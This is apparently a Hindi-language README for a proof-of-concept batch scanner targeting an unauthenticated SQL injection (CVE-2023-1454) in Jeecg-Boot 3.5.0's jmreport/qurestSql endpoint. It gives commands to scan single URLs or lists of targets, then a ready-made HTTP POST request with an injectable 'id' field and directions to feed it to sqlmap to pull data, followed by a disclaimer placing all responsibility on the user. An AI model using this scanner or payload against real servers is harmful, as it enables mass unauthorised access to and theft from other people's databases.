
jmreport/qurestSql अनधिकृत SQL इंजेक्शन बैच स्कैन POC
jmreport/qurestSql अनधिकृत SQL इंजेक्शन बैच स्कैन POC Jeecg-Boot स्प्रिंग बूट और Jeecg-Boot-Plus पर आधारित एक तीव्र विकास मंच है। नवीनतम jeecg-boot 3.5.0 में कई SQL इंजेक्शन कमजोरियाँ पाई गई हैं।
python3 CVE-2023-1454-scan.py -u http://127.0.0.1:1111 एकल URL परीक्षण
python3 CVE-2023-1454-scan.py -f url.txt बैच जांच
स्कैन समाप्त होने के बाद वर्तमान निर्देशिका में कमजोर URL वाली vuln.txt फ़ाइल उत्पन्न होगी।
poc:

exp:
डेटा पैकेट को txt के रूप में सहेजें और sqlmap का उपयोग करके डेटा प्राप्त किया जा सकता है:
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: xxx.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2088.112 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 129
{"apiSelectId":"1290104038414721025",
"id":"1*"}

इस दस्तावेज़ में दी गई जानकारी के प्रसार या उपयोग से उत्पन्न किसी भी प्रत्यक्ष या अप्रत्यक्ष परिणाम और हानि के लिए केवल उपयोगकर्ता स्वयं जिम्मेदार होगा; लेखक कोई जिम्मेदारी नहीं लेता है।